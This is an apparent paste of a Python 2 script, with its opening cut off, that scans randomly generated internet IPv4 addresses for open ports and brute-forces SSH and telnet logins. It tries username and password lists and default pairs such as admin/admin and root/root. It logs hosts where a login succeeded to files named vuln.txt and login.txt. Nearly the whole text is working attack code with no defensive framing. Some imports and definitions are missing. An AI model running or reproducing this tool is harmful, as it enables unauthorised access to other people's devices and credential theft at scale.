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a guest
Aug 16th, 2016
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  1. switches = ''
  2. print('\n ----PARAMETERS----')
  3. print('***********************************************')
  4. if options.targetPorts != None:
  5. print('[!] Scanning for port(s): ' + str(options.targetPorts))
  6. switches = switches + ' -p ' + str(options.targetPorts)
  7. if options.aClass != None:
  8. print('[!] Scanning using first octet: ' + str(options.aClass))
  9. # switches = switches + ' -a ' + str(options.aClass)
  10. if options.bClass != None:
  11. print('[!] Scanning using second octet: ' + str(options.bClass))
  12. # switches = switches + ' -b ' + str(options.bClass)
  13. if options.cClass != None:
  14. print('[!] Scanning using third octet: ' + str(options.cClass))
  15. # switches = switches + ' -c ' + str(options.cClass)
  16. if options.brute != False:
  17. print('[!] Using ssh bruteforce')
  18. switches = switches + ' -l'
  19. if options.bruteTel != False:
  20. print('[!] Using telnet bruteforce')
  21. switches = switches + ' -T'
  22. if options.bruting != False:
  23. print('[!] Showing addresses being bruteForced')
  24. switches = switches + ' -1'
  25. if options.scanned != False:
  26. print('[!] Showing showing all scan fails')
  27. switches = switches + ' -2'
  28. if options.passAttempt != False:
  29. print('[!] Showing bruteforce attempts')
  30. switches = switches + ' -3'
  31. if options.openPort != False:
  32. print('[!] Showing addresses with open ports')
  33. switches = switches + ' -4'
  34. if options.verbose != False:
  35. print('[!] Showing all output')
  36. switches = switches + ' -V'
  37. if options.fixed != None:
  38. print('[!] Using a fixed login option: ' + str(options.fixed))
  39. switches = switches + ' -f ' + str(options.fixed)
  40. if options.bios != False:
  41. print('[!] Creating bios output')
  42. switches = switches + ' -B'
  43. if options.timeOut != None:
  44. print('[!] Using timeout: ' + str(options.timeOut))
  45. switches = switches + ' -o ' + str(options.timeOut)
  46. fName = os.path.realpath(__file__)
  47. print('***********************************************\n')
  51. global fourth
  52. fourth = 0
  54. def go():
  55. # print('[!] NAILED IT!')
  56. go = True
  58. def gen():
  59. global log
  60. global firstBios
  61. global secondBios
  62. global thirdBios
  63. global fourthBios
  64. global threads
  65. #print('started gen')
  66. try:
  67. parser = optparse.OptionParser("%prog -t <target host(s)> -p <target port(s)>")
  68. parser.add_option('-t', dest='targetHosts', type='string', help='Specify the target host(s); Separate them by commas or enter \'scan\' to scan random addresses')
  69. parser.add_option('-p', dest='targetPorts', type='string', help='Specify the target port(s); Separate them by commas----use \'all\' to scan 1-65535')
  70. parser.add_option('-a', dest='aClass', type='string', help='Specify the 1st octet')
  71. parser.add_option('-b', dest='bClass', type='string', help='Specify the 2nd octet')
  72. parser.add_option('-c', dest='cClass', type='string', help='Specify the 3rd octet')
  73. parser.add_option('-s', dest='threads', type='int', help='Specify number of threads for scanning')
  74. parser.add_option('-l', action='store_true', dest='brute', default=False, help='Brute force ssh')
  75. parser.add_option('-T', action='store_true', dest='bruteTel', default=False, help='Brute force telnet')
  76. parser.add_option('-1', action='store_true', dest='bruting', default=False, help='Displays addresses that are being brute forced')
  77. parser.add_option('-2', action='store_true', dest='scanned', default=False, help='Displays address that could not be connected to')
  78. parser.add_option('-3', action='store_true', dest='passAttempt', default=False, help='Displays each password attempt during brute force')
  79. parser.add_option('-4', action='store_true', dest='openPort', default=False, help='Displays when an address has the searched port open')
  80. parser.add_option('-V', action='store_true', dest='verbose', default=False, help='Verbose mode')
  81. parser.add_option('-f', dest='fixed', type='string', help='Specify a fixed login(1, 2, 3, 4)')
  82. parser.add_option('-B', action='store_true', dest='bios', default=False, help='Create a bios for vuln using iterating IP gen')
  83. parser.add_option('-o', dest='timeOut', type='float', help='Set a timeout value for scanning')
  84. parser.add_option('-M', action='store_true', dest='master', default=False, help='User multiprocess scanning')
  85. parser.add_option('-C', action='store_true', dest='child', default=False, help='DO NOT USE')
  86. (options, args) = parser.parse_args()
  87. if options.threads != None:
  88. threads = options.threads
  89. global fourth
  90. going = True
  91. processes = 0
  92. while going == True:
  93. if (options.aClass == None):
  94. if options.bios == False:
  95. first = randint(1, 254)
  96. else:
  97. first = firstBios
  98. if secondBios >= 255:
  99. firstBios = firstBios + 1
  100. secondBios = 1
  101. if firstBios >= 255:
  102. # print('[!] Reached maximum address allocation: EXITING')
  103. going = False
  104. break
  105. # sys.exit()
  106. else:
  107. first = options.aClass
  108. if options.bios != False:
  109. if secondBios >= 255:
  110. # print('[!] Reached maximum address allocation: EXITING')
  111. going = False
  112. break
  113. # sys.exit()
  114. if (options.bClass == None):
  115. if options.bios == False:
  116. second = randint(1, 254)
  117. else:
  118. second = secondBios
  119. if thirdBios >= 255:
  120. secondBios = secondBios + 1
  121. thirdBios = 1
  122. else:
  123. second = options.bClass
  124. if options.bios != False:
  125. if thirdBios >= 255:
  126. # print('[!] Reached maximum address allocation: EXITING')
  127. going = False
  128. break
  129. # sys.exit()
  130. if (options.cClass == None):
  131. if options.bios == False:
  132. third = randint(1, 254)
  133. else:
  134. third = thirdBios
  135. if fourthBios >= 255:
  136. thirdBios = thirdBios + 1
  137. fourthBios = 1
  138. else:
  139. third = options.cClass
  140. if options.bios != False:
  141. if fourthBios >= 255:
  142. # print('[!] Reached maximum address allocation: EXITING')
  143. going = False
  144. break
  145. # sys.exit()
  146. if options.bios == False:
  147. fourth = randint(1, 254)
  148. else:
  149. fourth = fourthBios
  150. fourthBios = fourthBios + 1
  151. targetHost = str(first) + '.' + str(second) + '.' + str(third) + '.' + str(fourth)
  152. targetPorts = str(options.targetPorts).split(',')
  153. if options.master == False:
  154. for targetPort in targetPorts:
  155. conn(targetHost, int(targetPort))
  156. else:
  157. command = str(sys.executable) + ' ' + str(fName) + ' -t ' + str(targetHost) + str(switches) + ' -C &'
  158. try:
  159. os.system(command)
  160. # subprocess.Popen(command, shell = True)
  161. # print(command)
  162. processes = processes + 1
  163. except:
  164. print('[!] Couldn\'t start separate process: ' + str(targetHost))
  165. # print('[!] ' + targetHost + '|' + str(targetPort))
  166. if options.master != False:
  167. print('[!] Finished assigning jobs | processes started: ' + str(processes) + '\n')
  168. except KeyboardInterrupt:
  169. print('Scanning stopped')
  170. sys.exit()
  172. def conn(targetHost, targetPort):
  173. global threads
  174. parser = optparse.OptionParser("%prog -t <target host(s)> -p <target port(s)>")
  175. parser.add_option('-t', dest='targetHosts', type='string', help='Specify the target host(s); Separate them by commas or enter \'scan\' to scan random addresses')
  176. parser.add_option('-p', dest='targetPorts', type='string', help='Specify the target port(s); Separate them by commas----use \'all\' to scan 1-65535')
  177. parser.add_option('-a', dest='aClass', type='string', help='Specify the 1st octet')
  178. parser.add_option('-b', dest='bClass', type='string', help='Specify the 2nd octet')
  179. parser.add_option('-c', dest='cClass', type='string', help='Specify the 3rd octet')
  180. parser.add_option('-s', dest='threads', type='int', help='Specify number of threads for scanning')
  181. parser.add_option('-l', action='store_true', dest='brute', default=False, help='Brute force ssh')
  182. parser.add_option('-T', action='store_true', dest='bruteTel', default=False, help='Brute force telnet')
  183. parser.add_option('-1', action='store_true', dest='bruting', default=False, help='Displays addresses that are being brute forced')
  184. parser.add_option('-2', action='store_true', dest='scanned', default=False, help='Displays address that could not be connected to')
  185. parser.add_option('-3', action='store_true', dest='passAttempt', default=False, help='Displays each password attempt during brute force')
  186. parser.add_option('-4', action='store_true', dest='openPort', default=False, help='Displays when an address has the searched port open')
  187. parser.add_option('-V', action='store_true', dest='verbose', default=False, help='Verbose mode')
  188. parser.add_option('-f', dest='fixed', type='string', help='Specify a fixed login(1, 2, 3, 4)')
  189. parser.add_option('-B', action='store_true', dest='bios', default=False, help='Create a bios for vuln using iterating IP gen')
  190. parser.add_option('-o', dest='timeOut', type='float', help='Set a timeout value for scanning')
  191. parser.add_option('-M', action='store_true', dest='master', default=False, help='User multiprocess scanning')
  192. parser.add_option('-C', action='store_true', dest='child', default=False, help='DO NOT USE')
  193. (options, args) = parser.parse_args()
  194. if options.threads != None:
  195. threads = options.threads
  196. co = True
  198. scan = False
  199. if targetHost == 'scan':
  200. targetPort = str(options.targetPorts).split(',')
  201. # print(options.targetHosts) print(targetHost)
  202. print('Scanning for ports: ' + str(targetPort))
  203. count = 0
  204. while count < 1:
  205. try:
  206. conn = socket(AF_INET, SOCK_STREAM)
  207. # if options.timeOut != None:
  208. # conn.setsockettimeout(int(options.timeOut))
  209. if targetHost == 'scan':
  210. targetHost = gen()
  211. count = count - 1
  212. scan = True
  213. for port in targetPort:
  214. try:
  215. conn.connect((targetHost, int(port)))
  216. conn.close()
  217. except Exception, e:
  218. if options.scanned != False or options.verbose != False:
  219. print '[!] Connection to ' + targetHost + ' port ' + str(port) + ' failed: ' + str(e)
  220. co = False
  221. conn.close()
  222. conn = socket(AF_INET, SOCK_STREAM)
  224. else:
  225. conn.connect((targetHost, targetPort))
  226. conn.close()
  227. if scan == False:
  228. if options.openPort != False or options.verbose != False and options.bios == False:
  229. print '[+] Connection to ' + targetHost + ' port ' + str(targetPort) + ' succeeded!'
  230. elif options.bios != False:
  231. print(targetHost)
  232. if options.bios == False:
  233. log = open('log.txt', 'a')
  234. log.write('[+] Connection to ' + targetHost + ' port ' + str(targetPort) + ' succeeded!\n')
  235. else:
  236. log = open('bios.txt', 'a')
  237. log.write(targetHost + '\n')
  238. log.close()
  239. elif co == True:
  240. if options.openPort != False or options.verbose != False and options.bios == False:
  241. print '[+] Connection to ' + targetHost + ' port ' + str(port) + ' succeeded!'
  242. log = open('log.txt', 'a')
  243. log.write('[+] Connection to ' + targetHost + ' port ' + str(port) + ' succeeded!\n')
  244. elif options.bios != False:
  245. print(targetHost)
  246. log = open('bios.txt', 'a')
  247. log.write(targetHost + '\n')
  248. log.close()
  249. if options.bruteTel != False and int(targetPort) == 23:
  250. br = True
  251. good = False
  252. HOST = targetHost
  253. if options.bruting != False or options.verbose != False:
  254. print('Attempting telnet brute force: ' + str(HOST))
  255. tn = telnetlib.Telnet(HOST)
  256. tn.read_until('login: ')
  257. # if 'closed' in resp:
  258. # print('[!] Closed in resp')
  259. # br = False
  260. # good = False
  261. # pass
  262. for username in usernames:
  263. for password in passwords:
  264. if options.passAttempt != False or options.verbose != False:
  265. print('[!] Trying: ' + HOST + ' | username: ' + username + ' | password: ' + password)
  266. user = username
  267. # try:
  268. tn.write(user + "\n")
  269. # except:
  270. # print('[!] Username invalid')
  271. # br = False
  272. try:
  273. # if password:
  274. # print('[!] waiting for password prompt')
  275. tn.read_until('Password: ')
  276. # print('[!] got password prompt')
  277. tn.write(password + "\n")
  278. # print('[!] presented password')
  279. # print('[!] Sending verification command')
  280. tn.write("ls\n")
  281. tn.write("exit\n")
  282. # print('[!] Sent command')
  283. # print('[!] read all')
  284. br = True
  285. good = True
  286. # print('[!] Changed variables')
  287. resp = tn.read_all()
  288. # print('[!] set resp variable')
  289. # print(resp)
  290. if 'Authentication failed' in resp:
  291. # print('[!] Authentication failed')
  292. br = False
  293. good = False
  294. pass
  295. elif 'Authentication failed' not in resp:
  296. br = True
  297. good = True
  298. break
  299. else:
  300. br = False
  301. good = False
  302. pass
  303. except:
  304. br = False
  305. good = False
  306. # print('[!] Password invalid')
  307. pass
  308. if br == True:
  309. break
  310. if 'logout' in resp:
  311. print('Succeeded: ' + targetHost + '|' + str(username) + '|' + str(password) + '|' + str(targetPort))
  312. log=open('vuln.txt', 'a')
  313. log.write(targetHost + '|' + str(username) + '|' + str(password) + '|' + str(targetPort) + '\n')
  314. log.close()
  315. tn.close()
  316. if options.brute != False and int(targetPort) == 22:
  317. # ssh = paramiko.Transport((targetHost, targetPort))
  318. if options.bruting != False or options.verbose != False:
  319. print('Attempting ssh brute force: ' + targetHost)
  320. br = True
  321. good = False
  322. if options.fixed == None:
  323. for username in usernames:
  324. # print('[!] Using username: ' + str(username))
  325. for password in passwords:
  326. br = True
  327. if options.passAttempt != False or options.verbose != False:
  328. print('Trying ' + targetHost + ' | username: ' + str(username) + ' | password: ' + password)
  329. try:
  330. # ssh.connect(username=username, password=password)
  331. ssh = paramiko.SSHClient()
  332. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  333. paramiko.util.log_to_file("filename.log")
  334. ssh.connect(targetHost, port=int(targetPort), username=username, password=password, timeout=10)
  335. ssh.close()
  336. go()
  337. br = True
  338. # print('[!] Set br to True')
  339. good = True
  340. break
  341. except:
  342. ssh.close()
  343. br = False
  344. pass
  345. if br == True:
  346. # print('[!] Using br')
  347. break
  349. # print('[!] Made it to else')
  350. else:
  351. # print('[!] Entered else')
  352. if options.fixed == '1':
  353. username = 'admin'
  354. password = 'admin'
  355. elif options.fixed == '2':
  356. username = 'admin'
  357. password = '1234'
  358. elif options.fixed == '3':
  359. username = 'root'
  360. password = 'root'
  361. elif options.fixed == '4':
  362. username = 'root'
  363. password = '1234'
  364. else:
  365. print('[!] That is not a fixed login option')
  366. sys.exit()
  367. br = True
  368. if options.passAttempt != False or options.verbose != False:
  369. print('Trying: ' + targetHost + ' | username: ' + str(username) + ' | password: ' + str(password) + ' | port: ' + str(targetPort))
  370. try:
  371. # ssh.connect(username=username, password=password)
  372. ssh = paramiko.SSHClient()
  373. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  374. paramiko.util.log_to_file("filename.log")
  375. ssh.connect(targetHost, port=int(targetPort), username=username, password=password, timeout=10)
  376. ssh.close()
  377. go()
  378. br=True
  379. good=True
  380. # print('[!] Good is True')
  381. except:
  382. ssh.close()
  383. br=False
  384. # print('[!] Good is false')
  385. good=False
  386. pass
  387. # if br == True:
  388. # print('[!] br is true')
  389. # print('[!] Made it past else')
  390. output = 'nope'
  391. # print(good)
  392. if good == True:
  393. # print('[!] good is true')
  394. # stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  395. # output =
  396. # print(output)
  397. # if 'inet' in output:
  398. print('Succeeded: ' + targetHost + '|' + username + '|' + password + '|' + str(targetPort))
  399. log = open('login.txt', 'a')
  400. log.write(targetHost + '|' + username + '|' + password + '|' + str(targetPort) + '\n')
  401. log.close()
  402. # ssh.close()
  403. except Exception, e:
  404. if scan == False:
  405. if options.scanned != False or options.verbose != False:
  406. print '[!] Connection to ' + targetHost + ' port ' + str(targetPort) + ' failed: ' + str(e)
  407. finally:
  408. # if scan == False:
  409. # conn.close()
  410. count = count + 1
  411. if scan == True:
  412. targetHost = 'scan'
  414. def main():
  415. global scan
  416. global threads
  417. parser = optparse.OptionParser("%prog -t <target host(s)> -p <target port(s)>")
  418. parser.add_option('-t', dest='targetHosts', type='string', help='Specify the target host(s); Separate them by commas or enter \'scan\' to scan random addresses')
  419. parser.add_option('-p', dest='targetPorts', type='string', help='Specify the target port(s); Separate them by commas----use \'all\' to scan 1-65535')
  420. parser.add_option('-a', dest='aClass', type='string', help='Specify the 1st octet')
  421. parser.add_option('-b', dest='bClass', type='string', help='Specify the 2nd octet')
  422. parser.add_option('-c', dest='cClass', type='string', help='Specify the 3rd octet')
  423. parser.add_option('-s', dest='threads', type='int', help='Specify number of threads for scanning')
  424. parser.add_option('-l', action='store_true', dest='brute', default=False, help='Brute force ssh')
  425. parser.add_option('-T', action='store_true', dest='bruteTel', default=False, help='Brute force telnet')
  426. parser.add_option('-1', action='store_true', dest='bruting', default=False, help='Displays addresses that are being brute forced')
  427. parser.add_option('-2', action='store_true', dest='scanned', default=False, help='Displays address that could not be connected to')
  428. parser.add_option('-3', action='store_true', dest='passAttempt', default=False, help='Displays each password attempt during brute force')
  429. parser.add_option('-4', action='store_true', dest='openPort', default=False, help='Displays when an address has the searched port open')
  430. parser.add_option('-V', action='store_true', dest='verbose', default=False, help='Verbose mode')
  431. parser.add_option('-f', dest='fixed', type='string', help='Specify a fixed login(1, 2, 3, 4)')
  432. parser.add_option('-B', action='store_true', dest='bios', default=False, help='Create a bios for vuln using iterating IP gen')
  433. parser.add_option('-o', dest='timeOut', type='float', help='Set a timeout value for scanning')
  434. parser.add_option('-M', action='store_true', dest='master', default=False, help='User multiprocess scanning')
  435. parser.add_option('-C', action='store_true', dest='child', default=False, help='DO NOT USE')
  436. (options, args) = parser.parse_args()
  437. if options.threads != None:
  438. threads = options.threads
  439. print('Scanning threads: ' + str(options.threads))
  440. if options.brute != False:
  441. if options.child == False:
  442. # print('Using ssh brute force')
  443. fuck = True
  444. if options.bruteTel != False:
  445. if options.child == False:
  446. # print('Using telnet brute force')
  447. fuck = True
  448. if (options.targetHosts == None) | (options.targetPorts == None):
  449. print parser.usage
  450. exit(0)
  452. targetHosts = str(options.targetHosts).split(',')
  453. if (options.targetPorts != 'all'):
  454. targetPorts = str(options.targetPorts).split(',')
  455. elif (options.targetHosts != 'scan'):
  456. targetPorts = range(1, 65535)
  457. if (options.targetPorts == 'all'):
  458. if options.timeOut != None:
  459. setdefaulttimeout(options.timeOut)
  460. print('Using timout: ' + str(options.timeOut))
  461. else:
  462. setdefaulttimeout(5)
  463. else:
  464. if options.timeOut != None:
  465. setdefaulttimeout(options.timeOut)
  466. if options.child == False:
  467. print('Using timout: ' + str(options.timeOut))
  468. else:
  469. setdefaulttimeout(5)
  470. if options.targetHosts == 'scan':
  471. #print('creating workers')
  472. try:
  473. # print('entered try')
  474. create_workers()
  475. create_jobs()
  476. except KeyboardInterrupt:
  477. print('enteres except')
  478. print('Stopping all threads')
  479. sys.exit()
  480. else:
  481. for targetHost in targetHosts:
  482. for targetPort in targetPorts:
  483. conn(targetHost, int(targetPort))
  484. #print ''
  486. #Create worker threads
  487. def create_workers():
  488. global threads
  490. for _ in range(NUMBER_OF_THREADS):
  491. t = threading.Thread(target=work)
  492. t.daemon = True
  493. t.start()
  494. #Do the next job in the queue
  495. def work():
  496. while True:
  497. x = queue.get()
  498. if x == 1:
  500. try:
  501. gen()
  502. except KeyboardInterrupt:
  503. sys.exit()
  504. queue.task_done()
  505. #Each list item is a new job
  506. def create_jobs():
  507. for x in JOB_NUMBER:
  508. queue.put(1)
  509. # queue.put(1)
  510. queue.join()
  512. #if __name__ == '__main__':
  513. try:
  514. main()
  515. except KeyboardInterrupt:
  516. print('fuck')
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